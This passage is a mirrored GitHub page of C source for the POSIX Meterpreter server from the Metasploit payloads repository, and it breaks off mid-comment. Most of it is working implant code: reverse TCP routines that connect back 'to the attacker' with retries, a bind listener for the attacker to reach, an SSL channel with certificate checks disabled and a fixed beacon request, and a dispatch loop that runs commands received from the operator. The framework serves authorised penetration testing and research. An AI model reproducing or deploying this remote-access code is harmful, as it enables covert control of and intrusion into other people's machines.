mirror of
https://github.com/rapid7/metasploit-payloads
synced 2025-03-24 18:16:24 +01:00
1392 lines
40 KiB
C
Executable File
1392 lines
40 KiB
C
Executable File
/*!
|
|
* @file server_setup.c
|
|
*/
|
|
#include "metsrv.h"
|
|
#include "../../common/common.h"
|
|
#include <netdb.h>
|
|
#include <netinet/in.h>
|
|
|
|
const unsigned int hAppInstance = 0x504b5320; // 'PKS '
|
|
|
|
/*! @brief An array of locks for use by OpenSSL. */
|
|
static LOCK **ssl_locks = NULL;
|
|
|
|
/*!
|
|
* @brief Perform the reverse_tcp connect.
|
|
* @param reverseSocket The existing socket that refers to the remote host connection, closed on failure.
|
|
* @param sockAddr The SOCKADDR structure which contains details of the connection.
|
|
* @param sockAddrSize The size of the \c sockAddr structure.
|
|
* @param retryTotal The number of seconds to continually retry for.
|
|
* @param retryWait The number of seconds between each connect attempt.
|
|
* @return Indication of success or failure.
|
|
*/
|
|
static DWORD reverse_tcp_run(SOCKET reverseSocket, struct sockaddr* sockAddr, int sockAddrSize, DWORD retryTotal, DWORD retryWait)
|
|
{
|
|
DWORD result = ERROR_SUCCESS;
|
|
int start = current_unix_timestamp();
|
|
do {
|
|
int retryStart = current_unix_timestamp();
|
|
if ((result = connect(reverseSocket, sockAddr, sockAddrSize)) != SOCKET_ERROR) {
|
|
break;
|
|
}
|
|
|
|
dprintf("[TCP RUN] Connection failed, sleeping for %u s", retryWait);
|
|
sleep(retryWait * 1000);
|
|
} while (((DWORD)current_unix_timestamp() - (DWORD)start) < retryTotal);
|
|
|
|
if (result == SOCKET_ERROR) {
|
|
closesocket(reverseSocket);
|
|
}
|
|
|
|
return result;
|
|
}
|
|
|
|
/*!
|
|
* @brief Connects to a provided host/port (IPv4), downloads a payload and executes it.
|
|
* @param host String containing the name or IP of the host to connect to.
|
|
* @param port Port number to connect to.
|
|
* @param retryTotal The number of seconds to continually retry for.
|
|
* @param retryWait The number of seconds between each connect attempt.
|
|
* @return Indication of success or failure.
|
|
*/
|
|
static DWORD reverse_tcp4(const char* host, u_short port, DWORD retryTotal, DWORD retryWait, SOCKET* socketBuffer)
|
|
{
|
|
// prepare to connect to the attacker
|
|
DWORD result = ERROR_SUCCESS;
|
|
SOCKET socketHandle = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
|
|
struct hostent* target = gethostbyname(host);
|
|
char* targetIp = inet_ntoa(*(struct in_addr *)*target->h_addr_list);
|
|
|
|
struct sockaddr_in sock = { 0 };
|
|
|
|
sock.sin_addr.s_addr = inet_addr(targetIp);
|
|
sock.sin_family = AF_INET;
|
|
sock.sin_port = htons(port);
|
|
*socketBuffer = 0;
|
|
|
|
result = reverse_tcp_run(socketHandle, (struct sockaddr*)&sock, sizeof(sock), retryTotal, retryWait);
|
|
|
|
if (result == ERROR_SUCCESS)
|
|
{
|
|
*socketBuffer = socketHandle;
|
|
}
|
|
|
|
return result;
|
|
}
|
|
|
|
|
|
/*!
|
|
* @brief Connects to a provided host/port (IPv6), downloads a payload and executes it.
|
|
* @param host String containing the name or IP of the host to connect to.
|
|
* @param service The target service/port.
|
|
* @param scopeId IPv6 scope ID.
|
|
* @param retryTotal The number of seconds to continually retry for.
|
|
* @param retryWait The number of seconds between each connect attempt.
|
|
* @return Indication of success or failure.
|
|
*/
|
|
static DWORD reverse_tcp6(const char* host, const char* service, ULONG scopeId, DWORD retryTotal, DWORD retryWait, SOCKET* socketBuffer)
|
|
{
|
|
int start;
|
|
DWORD result = ERROR_SUCCESS;
|
|
SOCKET socketHandle;
|
|
struct addrinfo hints = { 0 };
|
|
|
|
*socketBuffer = 0;
|
|
|
|
hints.ai_family = AF_INET6;
|
|
hints.ai_socktype = SOCK_STREAM;
|
|
hints.ai_protocol = IPPROTO_TCP;
|
|
|
|
struct addrinfo* addresses;
|
|
if (getaddrinfo(host, service, &hints, &addresses) != 0)
|
|
{
|
|
return errno;
|
|
}
|
|
|
|
// prepare to connect to the attacker
|
|
socketHandle = socket(AF_INET6, SOCK_STREAM, IPPROTO_TCP);
|
|
|
|
if (socketHandle == INVALID_SOCKET)
|
|
{
|
|
dprintf("[STAGELESS IPV6] failed to connect to attacker");
|
|
return errno;
|
|
}
|
|
|
|
start = current_unix_timestamp();
|
|
do
|
|
{
|
|
struct addrinfo* address = NULL;
|
|
int retryStart = current_unix_timestamp();
|
|
for (address = addresses; address != NULL; address = address->ai_next)
|
|
{
|
|
((struct sockaddr_in6*)address->ai_addr)->sin6_scope_id = scopeId;
|
|
|
|
if (connect(socketHandle, address->ai_addr, (int)address->ai_addrlen) != SOCKET_ERROR)
|
|
{
|
|
dprintf("[STAGELESS IPV6] Socket successfully connected");
|
|
*socketBuffer = socketHandle;
|
|
freeaddrinfo(addresses);
|
|
return ERROR_SUCCESS;
|
|
}
|
|
}
|
|
|
|
dprintf("[TCP RUN] Connection failed, sleeping for %u s", retryWait);
|
|
sleep(retryWait);
|
|
} while (((DWORD)current_unix_timestamp() - (DWORD)start) < retryTotal);
|
|
|
|
closesocket(socketHandle);
|
|
freeaddrinfo(addresses);
|
|
|
|
return errno;
|
|
}
|
|
|
|
/*!
|
|
* @brief Perform the bind_tcp process.
|
|
* @param listenSocket The existing listen socket that refers to the remote host connection, closed before returning.
|
|
* @param sockAddr The SOCKADDR structure which contains details of the connection.
|
|
* @param sockAddrSize The size of the \c sockAddr structure.
|
|
* @param acceptSocketBuffer Buffer that will receive the accepted socket handle on success.
|
|
* @return Indication of success or failure.
|
|
*/
|
|
static DWORD bind_tcp_run(SOCKET listenSocket, struct sockaddr* sockAddr, int sockAddrSize, SOCKET* acceptSocketBuffer)
|
|
{
|
|
SOCKET acceptSocket;
|
|
DWORD result = ERROR_SUCCESS;
|
|
|
|
do
|
|
{
|
|
int yes = 1;
|
|
if (setsockopt(listenSocket, SOL_SOCKET, SO_REUSEADDR, &yes, sizeof(yes)) != 0)
|
|
{
|
|
dprintf("[BIND RUN] Failed to set sock opt: %u", errno);
|
|
result = errno;
|
|
break;
|
|
}
|
|
|
|
if (bind(listenSocket, sockAddr, sockAddrSize) == SOCKET_ERROR)
|
|
{
|
|
dprintf("[BIND RUN] Socket failed to bind: %u", errno);
|
|
result = errno;
|
|
break;
|
|
}
|
|
|
|
dprintf("[BIND RUN] Socket bound successfully");
|
|
|
|
if (listen(listenSocket, 1) == SOCKET_ERROR)
|
|
{
|
|
result = errno;
|
|
break;
|
|
}
|
|
|
|
dprintf("[BIND RUN] Listening ...");
|
|
|
|
// Setup, ready to go, now wait for the connection.
|
|
acceptSocket = accept(listenSocket, NULL, NULL);
|
|
|
|
if (acceptSocket == INVALID_SOCKET)
|
|
{
|
|
result = errno;
|
|
break;
|
|
}
|
|
|
|
dprintf("[BIND RUN] Valid socket accepted %u", acceptSocket);
|
|
|
|
*acceptSocketBuffer = acceptSocket;
|
|
} while (0);
|
|
|
|
closesocket(listenSocket);
|
|
|
|
return result;
|
|
}
|
|
|
|
/*!
|
|
* @brief Listens on a port for an incoming payload request.
|
|
* @param port Port number to listen on.
|
|
*/
|
|
static DWORD bind_tcp(u_short port, SOCKET* socketBuffer)
|
|
{
|
|
*socketBuffer = 0;
|
|
|
|
// prepare a connection listener for the attacker to connect to, and we
|
|
// attempt to bind to both ipv6 and ipv4 by default, and fallback to ipv4
|
|
// only if the process fails.
|
|
BOOL v4Fallback = FALSE;
|
|
SOCKET listenSocket = socket(AF_INET6, SOCK_STREAM, IPPROTO_TCP);
|
|
|
|
if (listenSocket == INVALID_SOCKET)
|
|
{
|
|
dprintf("[BIND] Unable to create IPv6 socket");
|
|
v4Fallback = TRUE;
|
|
}
|
|
else
|
|
{
|
|
int no = 0;
|
|
if (setsockopt(listenSocket, IPPROTO_IPV6, IPV6_V6ONLY, (char*)&no, sizeof(no)) == SOCKET_ERROR)
|
|
{
|
|
// fallback to ipv4 - we're probably running on Windows XP or earlier here, which means that to
|
|
// support IPv4 and IPv6 we'd need to create two separate sockets. IPv6 on XP isn't that common
|
|
// so instead, we'll just revert back to v4 and listen on that one address instead.
|
|
dprintf("[BIND] Unable to remove IPV6_ONLY option");
|
|
closesocket(listenSocket);
|
|
v4Fallback = TRUE;
|
|
}
|
|
}
|
|
|
|
if (v4Fallback)
|
|
{
|
|
dprintf("[BIND] Falling back to IPV4");
|
|
listenSocket = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
|
|
}
|
|
|
|
struct sockaddr_in6 sockAddr = { 0 };
|
|
|
|
if (v4Fallback)
|
|
{
|
|
struct sockaddr_in* v4Addr = (struct sockaddr_in*)&sockAddr;
|
|
v4Addr->sin_addr.s_addr = htons(INADDR_ANY);
|
|
v4Addr->sin_family = AF_INET;
|
|
v4Addr->sin_port = htons(port);
|
|
}
|
|
else
|
|
{
|
|
sockAddr.sin6_addr = in6addr_any;
|
|
sockAddr.sin6_family = AF_INET6;
|
|
sockAddr.sin6_port = htons(port);
|
|
}
|
|
|
|
return bind_tcp_run(listenSocket, (struct sockaddr*)&sockAddr, v4Fallback ? sizeof(struct sockaddr_in) : sizeof(struct sockaddr_in6), socketBuffer);
|
|
}
|
|
|
|
|
|
/*!
|
|
* @brief A callback function used by OpenSSL to leverage native system locks.
|
|
* @param mode The lock mode to set.
|
|
* @param type The lock type to operate on.
|
|
* @param file Unused.
|
|
* @param line Unused.
|
|
*/
|
|
static void server_locking_callback(int mode, int type, const char *file, int line)
|
|
{
|
|
if (mode & CRYPTO_LOCK) {
|
|
lock_acquire(ssl_locks[type]);
|
|
} else {
|
|
lock_release(ssl_locks[type]);
|
|
}
|
|
}
|
|
|
|
/*!
|
|
* @brief A callback function used by OpenSSL to get the current threads id.
|
|
* @returns The current thread ID.
|
|
* @remarks While not needed on windows this must be used for posix meterpreter.
|
|
*/
|
|
static long unsigned int server_threadid_callback(void)
|
|
{
|
|
return pthread_self();
|
|
}
|
|
|
|
/*!
|
|
* @brief A callback function for dynamic lock creation for OpenSSL.
|
|
* @returns A pointer to a lock that can be used for synchronisation.
|
|
* @param file _Ignored_
|
|
* @param line _Ignored_
|
|
*/
|
|
static struct CRYPTO_dynlock_value *server_dynamiclock_create(const char *file, int line)
|
|
{
|
|
return (struct CRYPTO_dynlock_value *)lock_create();
|
|
}
|
|
|
|
/*!
|
|
* @brief A callback function for dynamic lock locking for OpenSSL.
|
|
* @param mode A bitmask which indicates the lock mode.
|
|
* @param l A point to the lock instance.
|
|
* @param file _Ignored_
|
|
* @param line _Ignored_
|
|
*/
|
|
static void server_dynamiclock_lock(int mode, struct CRYPTO_dynlock_value *l, const char *file,
|
|
int line)
|
|
{
|
|
LOCK *lock = (LOCK *) l;
|
|
if (mode & CRYPTO_LOCK) {
|
|
lock_acquire(lock);
|
|
} else {
|
|
lock_release(lock);
|
|
}
|
|
}
|
|
|
|
/*!
|
|
* @brief A callback function for dynamic lock destruction for OpenSSL.
|
|
* @param l A point to the lock instance.
|
|
* @param file _Ignored_
|
|
* @param line _Ignored_
|
|
*/
|
|
static void server_dynamiclock_destroy(struct CRYPTO_dynlock_value *l, const char *file, int line)
|
|
{
|
|
lock_destroy((LOCK *) l);
|
|
}
|
|
|
|
/*!
|
|
* @brief Flush all pending data on the connected socket before doing SSL.
|
|
* @param remote Pointer to the remote instance.
|
|
*/
|
|
static VOID server_socket_flush(Transport* transport)
|
|
{
|
|
TcpTransportContext* ctx = (TcpTransportContext*)transport->ctx;
|
|
fd_set fdread;
|
|
DWORD ret;
|
|
char buff[4096];
|
|
|
|
lock_acquire(transport->lock);
|
|
|
|
while (1) {
|
|
struct timeval tv;
|
|
LONG data;
|
|
|
|
FD_ZERO(&fdread);
|
|
FD_SET(ctx->fd, &fdread);
|
|
|
|
// Wait for up to one second for any errant socket data to appear
|
|
tv.tv_sec = 1;
|
|
tv.tv_usec = 0;
|
|
|
|
data = select((int)ctx->fd + 1, &fdread, NULL, NULL, &tv);
|
|
if (data == 0) {
|
|
break;
|
|
}
|
|
|
|
ret = recv(ctx->fd, buff, sizeof(buff), 0);
|
|
dprintf("[SERVER] Flushed %d bytes from the buffer", ret);
|
|
|
|
// The socket closed while we waited
|
|
if (ret <= 0) {
|
|
break;
|
|
}
|
|
continue;
|
|
}
|
|
|
|
lock_release(transport->lock);
|
|
}
|
|
|
|
/*!
|
|
* @brief Poll a socket for data to recv and block when none available.
|
|
* @param remote Pointer to the remote instance.
|
|
* @param timeout Amount of time to wait before the poll times out (in milliseconds).
|
|
* @return Indication of success or failure.
|
|
*/
|
|
static LONG server_socket_poll(Remote * remote, long timeout) {
|
|
TcpTransportContext* ctx = (TcpTransportContext*)remote->transport->ctx;
|
|
struct timeval tv;
|
|
LONG result;
|
|
fd_set fdread;
|
|
|
|
lock_acquire(remote->lock);
|
|
FD_ZERO(&fdread);
|
|
FD_SET(ctx->fd, &fdread);
|
|
tv.tv_sec = 0;
|
|
tv.tv_usec = timeout;
|
|
result = select((int)ctx->fd + 1, &fdread, NULL, NULL, &tv);
|
|
|
|
if (result == -1 && (errno == EINTR || errno == EAGAIN || errno == EWOULDBLOCK)) {
|
|
result = 0;
|
|
}
|
|
|
|
lock_release(remote->lock);
|
|
return result;
|
|
}
|
|
|
|
/*!
|
|
* @brief Initialize the OpenSSL subsystem for use in a multi threaded enviroment.
|
|
* @param transport Pointer to the transport instance.
|
|
* @return Indication of success or failure.
|
|
*/
|
|
static BOOL server_initialize_ssl(Transport* transport) {
|
|
int i;
|
|
|
|
lock_acquire(transport->lock);
|
|
|
|
// Begin to bring up the OpenSSL subsystem...
|
|
CRYPTO_malloc_init();
|
|
SSL_load_error_strings();
|
|
SSL_library_init();
|
|
|
|
// Setup the required OpenSSL multi-threaded enviroment...
|
|
ssl_locks = malloc(CRYPTO_num_locks() * sizeof(LOCK *));
|
|
if (ssl_locks == NULL) {
|
|
dprintf("[SSL INIT] failed to allocate locks (%d locks)", CRYPTO_num_locks());
|
|
lock_release(transport->lock);
|
|
return FALSE;
|
|
}
|
|
|
|
for (i = 0; i < CRYPTO_num_locks(); i++) {
|
|
ssl_locks[i] = lock_create();
|
|
}
|
|
|
|
CRYPTO_set_id_callback(server_threadid_callback);
|
|
CRYPTO_set_locking_callback(server_locking_callback);
|
|
CRYPTO_set_dynlock_create_callback(server_dynamiclock_create);
|
|
CRYPTO_set_dynlock_lock_callback(server_dynamiclock_lock);
|
|
CRYPTO_set_dynlock_destroy_callback(server_dynamiclock_destroy);
|
|
lock_release(transport->lock);
|
|
|
|
return TRUE;
|
|
}
|
|
|
|
/*!
|
|
* @brief Bring down the OpenSSL subsystem
|
|
* @param transport Pointer to the transport instance.
|
|
* @return Indication of success or failure.
|
|
*/
|
|
static BOOL server_destroy_ssl(Transport* transport) {
|
|
TcpTransportContext* ctx = NULL;
|
|
int i;
|
|
|
|
if (transport) {
|
|
dprintf("[SERVER] Destroying SSL");
|
|
lock_acquire(transport->lock);
|
|
if (transport && transport->ctx) {
|
|
ctx = (TcpTransportContext*)transport->ctx;
|
|
SSL_free(ctx->ssl);
|
|
SSL_CTX_free(ctx->ctx);
|
|
}
|
|
CRYPTO_set_locking_callback(NULL);
|
|
CRYPTO_set_id_callback(NULL);
|
|
CRYPTO_set_dynlock_create_callback(NULL);
|
|
CRYPTO_set_dynlock_lock_callback(NULL);
|
|
CRYPTO_set_dynlock_destroy_callback(NULL);
|
|
|
|
for (i = 0; i < CRYPTO_num_locks(); i++) {
|
|
lock_destroy(ssl_locks[i]);
|
|
}
|
|
|
|
free(ssl_locks);
|
|
lock_release(transport->lock);
|
|
}
|
|
|
|
return TRUE;
|
|
}
|
|
|
|
/*!
|
|
* @brief Negotiate SSL on the socket.
|
|
* @param transport Pointer to the transport instance.
|
|
* @return Indication of success or failure.
|
|
*/
|
|
static BOOL server_negotiate_ssl(Transport* transport) {
|
|
TcpTransportContext* ctx = (TcpTransportContext*)transport->ctx;
|
|
BOOL success = TRUE;
|
|
DWORD ret = 0;
|
|
DWORD res = 0;
|
|
lock_acquire(transport->lock);
|
|
|
|
ctx->meth = (SSL_METHOD*)TLSv1_client_method();
|
|
ctx->ctx = SSL_CTX_new(ctx->meth);
|
|
SSL_CTX_set_mode(ctx->ctx, SSL_MODE_AUTO_RETRY);
|
|
ctx->ssl = SSL_new(ctx->ctx);
|
|
SSL_set_verify(ctx->ssl, SSL_VERIFY_NONE, NULL);
|
|
if (SSL_set_fd(ctx->ssl, ctx->fd) == 0) {
|
|
dprintf("[SERVER] set fd failed");
|
|
success = FALSE;
|
|
goto out;
|
|
}
|
|
|
|
do {
|
|
if ((ret = SSL_connect(ctx->ssl)) != 1) {
|
|
res = SSL_get_error(ctx->ssl, ret);
|
|
dprintf("[SERVER] connect failed %d\n", res);
|
|
if (res == SSL_ERROR_WANT_READ || res == SSL_ERROR_WANT_WRITE) {
|
|
|
|
// Catch non-blocking socket errors and retry
|
|
continue;
|
|
}
|
|
success = FALSE;
|
|
break;
|
|
}
|
|
} while (ret != 1);
|
|
|
|
if (success == FALSE)
|
|
goto out;
|
|
|
|
dprintf("[SERVER] Sending a HTTP GET request to the remote side...");
|
|
if ((ret = SSL_write(ctx->ssl, "GET /123456789 HTTP/1.0\r\n\r\n", 27)) <= 0) {
|
|
dprintf("[SERVER] SSL write failed during negotiation with return: %d (%d)", ret,
|
|
SSL_get_error(ctx->ssl, ret));
|
|
}
|
|
|
|
out:
|
|
lock_release(transport->lock);
|
|
dprintf("[SERVER] Completed writing the HTTP GET request: %d", ret);
|
|
if (ret < 0) {
|
|
success = FALSE;
|
|
}
|
|
return success;
|
|
}
|
|
|
|
/*!
|
|
* @brief Transmit a packet via SSL _and_ destroy it.
|
|
* @param remote Pointer to the \c Remote instance.
|
|
* @param packet Pointer to the \c Packet that is to be sent.
|
|
* @param completion Pointer to the completion routines to process.
|
|
* @return An indication of the result of processing the transmission request.
|
|
* @remark This uses an SSL-encrypted TCP channel, and does not imply the use of HTTPS.
|
|
*/
|
|
DWORD packet_transmit_via_ssl(Remote* remote, Packet* packet, PacketRequestCompletion* completion)
|
|
{
|
|
CryptoContext* crypto;
|
|
Tlv requestId;
|
|
DWORD res;
|
|
DWORD idx;
|
|
TcpTransportContext* ctx = (TcpTransportContext*)remote->transport->ctx;
|
|
|
|
lock_acquire(remote->lock);
|
|
|
|
// If the packet does not already have a request identifier, create one for it
|
|
if (packet_get_tlv_string(packet, TLV_TYPE_REQUEST_ID, &requestId) != ERROR_SUCCESS)
|
|
{
|
|
DWORD index;
|
|
CHAR rid[32];
|
|
|
|
rid[sizeof(rid)-1] = 0;
|
|
|
|
for (index = 0; index < sizeof(rid)-1; index++)
|
|
{
|
|
rid[index] = (rand() % 0x5e) + 0x21;
|
|
}
|
|
|
|
packet_add_tlv_string(packet, TLV_TYPE_REQUEST_ID, rid);
|
|
}
|
|
|
|
do
|
|
{
|
|
// If a completion routine was supplied and the packet has a request
|
|
// identifier, insert the completion routine into the list
|
|
if ((completion) &&
|
|
(packet_get_tlv_string(packet, TLV_TYPE_REQUEST_ID,
|
|
&requestId) == ERROR_SUCCESS))
|
|
{
|
|
packet_add_completion_handler((LPCSTR)requestId.buffer, completion);
|
|
}
|
|
|
|
// If the endpoint has a cipher established and this is not a plaintext
|
|
// packet, we encrypt
|
|
if ((crypto = remote_get_cipher(remote)) &&
|
|
(packet_get_type(packet) != PACKET_TLV_TYPE_PLAIN_REQUEST) &&
|
|
(packet_get_type(packet) != PACKET_TLV_TYPE_PLAIN_RESPONSE))
|
|
{
|
|
ULONG origPayloadLength = packet->payloadLength;
|
|
PUCHAR origPayload = packet->payload;
|
|
|
|
// Encrypt
|
|
if ((res = crypto->handlers.encrypt(crypto, packet->payload,
|
|
packet->payloadLength, &packet->payload,
|
|
&packet->payloadLength)) !=
|
|
ERROR_SUCCESS)
|
|
{
|
|
SetLastError(res);
|
|
break;
|
|
}
|
|
|
|
// Destroy the original payload as we no longer need it
|
|
free(origPayload);
|
|
|
|
// Update the header length
|
|
packet->header.length = htonl(packet->payloadLength + sizeof(TlvHeader));
|
|
}
|
|
|
|
idx = 0;
|
|
while (idx < sizeof(packet->header))
|
|
{
|
|
// Transmit the packet's header (length, type)
|
|
res = SSL_write(
|
|
ctx->ssl,
|
|
(LPCSTR)(&packet->header) + idx,
|
|
sizeof(packet->header) - idx
|
|
);
|
|
|
|
if (res <= 0)
|
|
{
|
|
dprintf("[PACKET] transmit header failed with return %d at index %d\n", res, idx);
|
|
break;
|
|
}
|
|
idx += res;
|
|
}
|
|
|
|
if (res < 0)
|
|
{
|
|
break;
|
|
}
|
|
|
|
idx = 0;
|
|
while (idx < packet->payloadLength)
|
|
{
|
|
// Transmit the packet's payload (length, type)
|
|
res = SSL_write(
|
|
ctx->ssl,
|
|
packet->payload + idx,
|
|
packet->payloadLength - idx
|
|
);
|
|
|
|
if (res < 0)
|
|
{
|
|
break;
|
|
}
|
|
|
|
idx += res;
|
|
}
|
|
|
|
if (res < 0)
|
|
{
|
|
dprintf("[PACKET] transmit header failed with return %d at index %d\n", res, idx);
|
|
break;
|
|
}
|
|
|
|
SetLastError(ERROR_SUCCESS);
|
|
} while (0);
|
|
|
|
res = GetLastError();
|
|
|
|
// Destroy the packet
|
|
packet_destroy(packet);
|
|
|
|
lock_release(remote->lock);
|
|
|
|
return res;
|
|
}
|
|
|
|
/*!
|
|
* @brief Receive a new packet on the given remote endpoint.
|
|
* @param remote Pointer to the \c Remote instance.
|
|
* @param packet Pointer to a pointer that will receive the \c Packet data.
|
|
* @return An indication of the result of processing the transmission request.
|
|
*/
|
|
static DWORD packet_receive_via_ssl(Remote *remote, Packet **packet)
|
|
{
|
|
DWORD headerBytes = 0, payloadBytesLeft = 0, res;
|
|
CryptoContext *crypto = NULL;
|
|
Packet *localPacket = NULL;
|
|
TlvHeader header;
|
|
LONG bytesRead;
|
|
BOOL inHeader = TRUE;
|
|
PUCHAR payload = NULL;
|
|
ULONG payloadLength;
|
|
TcpTransportContext* ctx = (TcpTransportContext*)remote->transport->ctx;
|
|
|
|
lock_acquire(remote->lock);
|
|
|
|
do
|
|
{
|
|
// Read the packet length
|
|
while (inHeader)
|
|
{
|
|
if ((bytesRead = SSL_read(ctx->ssl, ((PUCHAR)&header + headerBytes), sizeof(TlvHeader)-headerBytes)) <= 0)
|
|
{
|
|
if (!bytesRead)
|
|
{
|
|
SetLastError(ERROR_NOT_FOUND);
|
|
}
|
|
|
|
if (bytesRead < 0)
|
|
{
|
|
dprintf("[PACKET] receive header failed with error code %d. SSLerror=%d, WSALastError=%d\n", bytesRead, SSL_get_error(ctx->ssl, bytesRead), WSAGetLastError());
|
|
SetLastError(ERROR_NOT_FOUND);
|
|
}
|
|
|
|
break;
|
|
}
|
|
|
|
headerBytes += bytesRead;
|
|
|
|
if (headerBytes != sizeof(TlvHeader))
|
|
{
|
|
continue;
|
|
}
|
|
|
|
inHeader = FALSE;
|
|
}
|
|
|
|
if (headerBytes != sizeof(TlvHeader))
|
|
{
|
|
break;
|
|
}
|
|
|
|
// Initialize the header
|
|
header.length = header.length;
|
|
header.type = header.type;
|
|
payloadLength = ntohl(header.length) - sizeof(TlvHeader);
|
|
payloadBytesLeft = payloadLength;
|
|
|
|
// Allocate the payload
|
|
if (!(payload = (PUCHAR)malloc(payloadLength)))
|
|
{
|
|
SetLastError(ERROR_NOT_ENOUGH_MEMORY);
|
|
break;
|
|
}
|
|
|
|
// Read the payload
|
|
while (payloadBytesLeft > 0)
|
|
{
|
|
if ((bytesRead = SSL_read(ctx->ssl, payload + payloadLength - payloadBytesLeft, payloadBytesLeft)) <= 0)
|
|
{
|
|
|
|
if (GetLastError() == WSAEWOULDBLOCK)
|
|
{
|
|
continue;
|
|
}
|
|
|
|
if (!bytesRead)
|
|
{
|
|
SetLastError(ERROR_NOT_FOUND);
|
|
}
|
|
|
|
if (bytesRead < 0)
|
|
{
|
|
dprintf("[PACKET] receive payload of length %d failed with error code %d. SSLerror=%d\n", payloadLength, bytesRead, SSL_get_error(ctx->ssl, bytesRead));
|
|
SetLastError(ERROR_NOT_FOUND);
|
|
}
|
|
|
|
break;
|
|
}
|
|
|
|
payloadBytesLeft -= bytesRead;
|
|
}
|
|
|
|
// Didn't finish?
|
|
if (payloadBytesLeft)
|
|
{
|
|
break;
|
|
}
|
|
|
|
// Allocate a packet structure
|
|
if (!(localPacket = (Packet *)malloc(sizeof(Packet))))
|
|
{
|
|
SetLastError(ERROR_NOT_ENOUGH_MEMORY);
|
|
break;
|
|
}
|
|
|
|
memset(localPacket, 0, sizeof(Packet));
|
|
|
|
// If the connection has an established cipher and this packet is not
|
|
// plaintext, decrypt
|
|
if ((crypto = remote_get_cipher(remote)) &&
|
|
(packet_get_type(localPacket) != PACKET_TLV_TYPE_PLAIN_REQUEST) &&
|
|
(packet_get_type(localPacket) != PACKET_TLV_TYPE_PLAIN_RESPONSE))
|
|
{
|
|
ULONG origPayloadLength = payloadLength;
|
|
PUCHAR origPayload = payload;
|
|
|
|
// Decrypt
|
|
if ((res = crypto->handlers.decrypt(crypto, payload, payloadLength, &payload, &payloadLength)) != ERROR_SUCCESS)
|
|
{
|
|
SetLastError(res);
|
|
break;
|
|
}
|
|
|
|
// We no longer need the encrypted payload
|
|
free(origPayload);
|
|
}
|
|
|
|
localPacket->header.length = header.length;
|
|
localPacket->header.type = header.type;
|
|
localPacket->payload = payload;
|
|
localPacket->payloadLength = payloadLength;
|
|
|
|
*packet = localPacket;
|
|
|
|
SetLastError(ERROR_SUCCESS);
|
|
|
|
} while (0);
|
|
|
|
res = GetLastError();
|
|
|
|
// Cleanup on failure
|
|
if (res != ERROR_SUCCESS)
|
|
{
|
|
if (payload)
|
|
{
|
|
free(payload);
|
|
}
|
|
if (localPacket)
|
|
{
|
|
free(localPacket);
|
|
}
|
|
}
|
|
|
|
lock_release(remote->lock);
|
|
|
|
return res;
|
|
}
|
|
|
|
/*!
|
|
* @brief The servers main dispatch loop for incoming requests using SSL over TCP
|
|
* @param remote Pointer to the remote endpoint for this server connection.
|
|
* @returns Indication of success or failure.
|
|
*/
|
|
static BOOL server_dispatch_tcp(Remote * remote, THREAD* dispatchThread)
|
|
{
|
|
BOOL running = TRUE;
|
|
LONG result = ERROR_SUCCESS;
|
|
Packet *packet = NULL;
|
|
THREAD *cpt = NULL;
|
|
dprintf("[DISPATCH] entering server_dispatch( 0x%08X )", remote);
|
|
|
|
// Bring up the scheduler subsystem.
|
|
result = scheduler_initialize(remote);
|
|
if (result != ERROR_SUCCESS) {
|
|
return result;
|
|
}
|
|
while (running) {
|
|
if (event_poll(dispatchThread->sigterm, 0)) {
|
|
dprintf("[DISPATCH] server dispatch thread signaled to terminate...");
|
|
break;
|
|
}
|
|
result = server_socket_poll(remote, 500000);
|
|
if (result > 0) {
|
|
result = packet_receive_via_ssl(remote, &packet);
|
|
if (result != ERROR_SUCCESS) {
|
|
dprintf("[DISPATCH] packet_receive returned %d, exiting dispatcher...", result);
|
|
break;
|
|
}
|
|
running = command_handle(remote, packet);
|
|
dprintf("[DISPATCH] command_process result: %s", (running ? "continue" : "stop"));
|
|
}
|
|
|
|
else if (result < 0) {
|
|
dprintf("[DISPATCH] server_socket_poll returned %d, exiting dispatcher...", result);
|
|
break;
|
|
}
|
|
}
|
|
|
|
dprintf("[DISPATCH] calling scheduler_destroy...")
|
|
scheduler_destroy();
|
|
|
|
dprintf("[DISPATCH] calling command_join_threads...")
|
|
command_join_threads();
|
|
|
|
dprintf("[DISPATCH] leaving server_dispatch.");
|
|
return result;
|
|
}
|
|
|
|
/*!
|
|
* @brief Destroy the TCP transport.
|
|
* @param transport Pointer to the TCP transport to destroy.
|
|
*/
|
|
static void transport_destroy_tcp(Transport* transport) {
|
|
if (transport && transport->type == METERPRETER_TRANSPORT_SSL) {
|
|
dprintf("[TRANS TCP] Destroying tcp transport for url %S", transport->url);
|
|
SAFE_FREE(transport->url);
|
|
SAFE_FREE(transport->ctx);
|
|
SAFE_FREE(transport);
|
|
}
|
|
}
|
|
|
|
/*!
|
|
* @brief Handle cleaning up on the client socket when MSF terminates the connection.
|
|
* @param thread Pointer to the thread instance.
|
|
* @return EXIT_SUCCESS
|
|
*/
|
|
DWORD THREADCALL cleanup_socket(THREAD* thread) {
|
|
char buf[4];
|
|
int result;
|
|
SOCKET fd = (SOCKET)thread->parameter1;
|
|
|
|
dprintf("[TCP] waiting for disconnect from remote");
|
|
// loop until FD_CLOSE comes through.
|
|
while ((result = recv(fd, buf, sizeof(buf), 0)) != 0) {
|
|
if (result <= 0) {
|
|
break;
|
|
}
|
|
}
|
|
|
|
dprintf("[TCP] disconnect received, cleaning up");
|
|
closesocket(fd);
|
|
thread_destroy(thread);
|
|
|
|
return EXIT_SUCCESS;
|
|
}
|
|
|
|
/*!
|
|
* @brief Reset the given TCP connection.
|
|
* @param transport Pointer to the TCP transport to reset.
|
|
* @param shuttingDown Indication that the Metsrv instance is terminating completely.
|
|
*/
|
|
static void transport_reset_tcp(Transport* transport, BOOL shuttingDown) {
|
|
if (transport && transport->type == METERPRETER_TRANSPORT_SSL) {
|
|
TcpTransportContext* ctx = (TcpTransportContext*)transport->ctx;
|
|
dprintf("[TCP] Resetting transport from %u", ctx->fd);
|
|
if (ctx->fd) {
|
|
if (shuttingDown) {
|
|
dprintf("[TCP] Transport is shutting down");
|
|
// we can terminate right here, given that we're closing up
|
|
closesocket(ctx->fd);
|
|
}
|
|
else {
|
|
dprintf("[TCP] It should now be safe to close the socket.");
|
|
THREAD* t = thread_create(cleanup_socket, (LPVOID)ctx->fd, NULL, NULL);
|
|
thread_run(t);
|
|
}
|
|
}
|
|
ctx->fd = 0;
|
|
dprintf("[TCP] Transport 0x%p is now reset to %u", transport, ctx->fd);
|
|
}
|
|
}
|
|
|
|
/*!
|
|
